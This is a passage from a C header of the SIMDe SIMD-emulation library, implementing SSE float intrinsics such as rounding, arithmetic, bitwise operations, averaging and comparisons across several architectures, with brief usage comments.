#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) || defined(SIMDE_ARM_NEON_A32V8)
if ((rounding & 7) == SIMDE_MM_FROUND_CUR_DIRECTION)
rounding = HEDLEY_STATIC_CAST(int, SIMDE_MM_GET_ROUNDING_MODE())
<< 13;
#endif
switch (rounding & ~SIMDE_MM_FROUND_NO_EXC) {
case SIMDE_MM_FROUND_CUR_DIRECTION:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_round(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_f32 = vrndiq_f32(a_.neon_f32);
#elif defined(simde_math_nearbyintf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_nearbyintf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_NEAREST_INT:
#if defined(SIMDE_POWER_ALTIVEC_P8_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_rint(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndnq_f32(a_.neon_f32);
#elif defined(simde_math_roundevenf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_roundevenf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_NEG_INF:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_floor(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndmq_f32(a_.neon_f32);
#elif defined(simde_math_floorf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_floorf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_POS_INF:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_ceil(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndpq_f32(a_.neon_f32);
#elif defined(simde_math_ceilf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_ceilf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
case SIMDE_MM_FROUND_TO_ZERO:
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_trunc(a_.altivec_f32));
#elif defined(SIMDE_ARM_NEON_A32V8_NATIVE)
r_.neon_f32 = vrndq_f32(a_.neon_f32);
#elif defined(simde_math_truncf)
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0]));
i++) {
r_.f32[i] = simde_math_truncf(a_.f32[i]);
}
#else
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
#endif
break;
default:
HEDLEY_UNREACHABLE_RETURN(simde_mm_undefined_pd());
}
return simde__m128_from_private(r_);
}
#if defined(SIMDE_X86_SSE4_1_NATIVE)
#define simde_mm_round_ps(a, rounding) _mm_round_ps((a), (rounding))
#else
#define simde_mm_round_ps(a, rounding) simde_x_mm_round_ps((a), (rounding), 0)
#endif
#if defined(SIMDE_X86_SSE4_1_ENABLE_NATIVE_ALIASES)
#define _mm_round_ps(a, rounding) simde_mm_round_ps((a), (rounding))
#endif
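/* Usage sketch: round every lane toward negative infinity; the NO_EXC bit is
 * masked off in the emulated path, which never raises FP exceptions anyway:
 *
 *   simde__m128 r = simde_mm_round_ps(x, SIMDE_MM_FROUND_TO_NEG_INF | SIMDE_MM_FROUND_NO_EXC);
 */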
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ps(simde_float32 e3, simde_float32 e2,
simde_float32 e1, simde_float32 e0)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ps(e3, e2, e1, e0);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_ALIGN_TO_16 simde_float32 data[4] = {e0, e1, e2, e3};
r_.neon_f32 = vld1q_f32(data);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_make(e0, e1, e2, e3);
#else
r_.f32[0] = e0;
r_.f32[1] = e1;
r_.f32[2] = e2;
r_.f32[3] = e3;
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ps(e3, e2, e1, e0) simde_mm_set_ps(e3, e2, e1, e0)
#endif
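/* Worked example: simde_mm_set_ps(3, 2, 1, 0) stores lanes in reverse
 * argument order, so f32[0] == 0 and f32[3] == 3. */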
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_set_ps1(simde_float32 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_set_ps1(a);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vdupq_n_f32(a);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
return vec_splats(a);
#else
return simde_mm_set_ps(a, a, a, a);
#endif
}
#define simde_mm_set1_ps(a) simde_mm_set_ps1(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_set_ps1(a) simde_mm_set_ps1(a)
#define _mm_set1_ps(a) simde_mm_set1_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_move_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_move_ss(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vsetq_lane_f32(vgetq_lane_f32(b_.neon_f32, 0), a_.neon_f32, 0);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_POWER_ALTIVEC_VECTOR(unsigned char)
m = {16, 17, 18, 19, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15};
r_.altivec_f32 = vec_perm(a_.altivec_f32, b_.altivec_f32, m);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v8x16_shuffle(b_.wasm_v128, a_.wasm_v128, 0, 1, 2,
3, 20, 21, 22, 23, 24, 25, 26, 27, 28,
29, 30, 31);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, a_.f32, b_.f32, 4, 1, 2, 3);
#else
r_.f32[0] = b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_move_ss(a, b) simde_mm_move_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_add_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_add_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vaddq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_add(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_add(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 + b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] + b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_add_ps(a, b) simde_mm_add_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_add_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_add_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_add_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t b0 = vgetq_lane_f32(b_.neon_f32, 0);
float32x4_t value = vsetq_lane_f32(b0, vdupq_n_f32(0), 0);
// the upper values in the result must be the remnants of <a>.
r_.neon_f32 = vaddq_f32(a_.neon_f32, value);
#else
r_.f32[0] = a_.f32[0] + b_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = a_.f32[2];
r_.f32[3] = a_.f32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_add_ss(a, b) simde_mm_add_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_and_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_and_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vandq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_and(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = a_.i32 & b_.i32;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_and(a_.altivec_f32, b_.altivec_f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = a_.i32[i] & b_.i32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_and_ps(a, b) simde_mm_and_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_andnot_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_andnot_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vbicq_s32(b_.neon_i32, a_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_andnot(b_.wasm_v128, a_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_andc(b_.altivec_f32, a_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = ~a_.i32 & b_.i32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = ~(a_.i32[i]) & b_.i32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_andnot_ps(a, b) simde_mm_andnot_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_xor_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_xor_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = veorq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_xor(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_xor(a_.altivec_i32, b_.altivec_i32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32f = a_.i32f ^ b_.i32f;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i] ^ b_.u32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_xor_ps(a, b) simde_mm_xor_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_or_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_or_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vorrq_s32(a_.neon_i32, b_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_or(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_or(a_.altivec_i32, b_.altivec_i32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32f = a_.i32f | b_.i32f;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u32) / sizeof(r_.u32[0])); i++) {
r_.u32[i] = a_.u32[i] | b_.u32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_or_ps(a, b) simde_mm_or_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_not_ps(simde__m128 a)
{
#if defined(SIMDE_X86_AVX512VL_NATIVE)
__m128i ai = _mm_castps_si128(a);
return _mm_castsi128_ps(_mm_ternarylogic_epi32(ai, ai, ai, 0x55));
#elif defined(SIMDE_X86_SSE2_NATIVE)
/* Note: we use ints instead of floats because we don't want cmpeq
* to return false for (NaN, NaN) */
__m128i ai = _mm_castps_si128(a);
return _mm_castsi128_ps(_mm_andnot_si128(ai, _mm_cmpeq_epi32(ai, ai)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vmvnq_s32(a_.neon_i32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 = vec_nor(a_.altivec_i32, a_.altivec_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_not(a_.wasm_v128);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = ~a_.i32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = ~(a_.i32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_select_ps(simde__m128 a, simde__m128 b, simde__m128 mask)
{
/* This function is for when you want to blend two elements together
* according to a mask. It is similar to _mm_blendv_ps, except that
* it is undefined whether the blend is based on the highest bit in
* each lane (like blendv) or just bitwise operations. This allows
* us to implement the function efficiently everywhere.
*
* Basically, you promise that all the lanes in mask are either 0 or
* ~0. */
#if defined(SIMDE_X86_SSE4_1_NATIVE)
return _mm_blendv_ps(a, b, mask);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b),
mask_ = simde__m128_to_private(mask);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_i32 = vbslq_s32(mask_.neon_u32, b_.neon_i32, a_.neon_i32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_v128_bitselect(b_.wasm_v128, a_.wasm_v128,
mask_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_i32 =
vec_sel(a_.altivec_i32, b_.altivec_i32, mask_.altivec_u32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = a_.i32 ^ ((a_.i32 ^ b_.i32) & mask_.i32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
r_.i32[i] = a_.i32[i] ^
((a_.i32[i] ^ b_.i32[i]) & mask_.i32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
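/* Usage sketch: the comparison functions in this file return all-ones or
 * all-zero lanes, which satisfies the mask contract above. For example, to
 * clamp negative lanes of v to zero (simde_mm_cmplt_ps is defined later in
 * this header):
 *
 *   simde__m128 zero = simde_mm_set1_ps(0.0f);
 *   simde__m128 mask = simde_mm_cmplt_ps(v, zero);          // ~0 where v < 0
 *   simde__m128 out  = simde_x_mm_select_ps(v, zero, mask); // picks zero there
 */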
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_avg_pu16(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_avg_pu16(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u16 = vrhadd_u16(b_.neon_u16, a_.neon_u16);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS) && \
defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR) && \
defined(SIMDE_CONVERT_VECTOR_)
uint32_t wa SIMDE_VECTOR(16);
uint32_t wb SIMDE_VECTOR(16);
uint32_t wr SIMDE_VECTOR(16);
SIMDE_CONVERT_VECTOR_(wa, a_.u16);
SIMDE_CONVERT_VECTOR_(wb, b_.u16);
wr = (wa + wb + 1) >> 1;
SIMDE_CONVERT_VECTOR_(r_.u16, wr);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u16) / sizeof(r_.u16[0])); i++) {
r_.u16[i] = (a_.u16[i] + b_.u16[i] + 1) >> 1;
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pavgw(a, b) simde_mm_avg_pu16(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_avg_pu16(a, b) simde_mm_avg_pu16(a, b)
#define _m_pavgw(a, b) simde_mm_avg_pu16(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_avg_pu8(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_avg_pu8(a, b);
#else
simde__m64_private r_, a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u8 = vrhadd_u8(b_.neon_u8, a_.neon_u8);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS) && \
defined(SIMDE_VECTOR_SUBSCRIPT_SCALAR) && \
defined(SIMDE_CONVERT_VECTOR_)
uint16_t wa SIMDE_VECTOR(16);
uint16_t wb SIMDE_VECTOR(16);
uint16_t wr SIMDE_VECTOR(16);
SIMDE_CONVERT_VECTOR_(wa, a_.u8);
SIMDE_CONVERT_VECTOR_(wb, b_.u8);
wr = (wa + wb + 1) >> 1;
SIMDE_CONVERT_VECTOR_(r_.u8, wr);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.u8) / sizeof(r_.u8[0])); i++) {
r_.u8[i] = (a_.u8[i] + b_.u8[i] + 1) >> 1;
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_m_pavgb(a, b) simde_mm_avg_pu8(a, b)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_avg_pu8(a, b) simde_mm_avg_pu8(a, b)
#define _m_pavgb(a, b) simde_mm_avg_pu8(a, b)
#endif
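/* Worked example: the average rounds half away from zero, e.g.
 * (3 + 4 + 1) >> 1 == 4. */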
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_abs_ps(simde__m128 a)
{
#if defined(SIMDE_X86_AVX512F_NATIVE) && \
(!defined(HEDLEY_GCC_VERSION) || HEDLEY_GCC_VERSION_CHECK(7, 1, 0))
return _mm512_castps512_ps128(_mm512_abs_ps(_mm512_castps128_ps512(a)));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vabsq_f32(a_.neon_f32);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_abs(a_.altivec_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_abs(a_.wasm_v128);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = simde_math_fabsf(a_.f32[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpeq_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpeq_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vceqq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_eq(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpeq(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), a_.f32 == b_.f32);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] == b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpeq_ps(a, b) simde_mm_cmpeq_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpeq_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpeq_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpeq_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] == b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpeq_ss(a, b) simde_mm_cmpeq_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpge_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpge_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcgeq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_ge(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpge(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 >= b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] >= b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpge_ps(a, b) simde_mm_cmpge_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpge_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpge_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpge_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] >= b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpge_ss(a, b) simde_mm_cmpge_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpgt_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpgt_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_u32 = vcgtq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_gt(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = HEDLEY_REINTERPRET_CAST(
SIMDE_POWER_ALTIVEC_VECTOR(float),
vec_cmpgt(a_.altivec_f32, b_.altivec_f32));
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.i32 = HEDLEY_STATIC_CAST(__typeof__(r_.i32), (a_.f32 > b_.f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = (a_.f32[i] > b_.f32[i]) ? ~UINT32_C(0)
: UINT32_C(0);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpgt_ps(a, b) simde_mm_cmpgt_ps((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpgt_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && !defined(__PGI)
return _mm_cmpgt_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpgt_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
r_.u32[0] = (a_.f32[0] > b_.f32[0]) ? ~UINT32_C(0) : UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpgt_ss(a, b) simde_mm_cmpgt_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmple_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmple_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
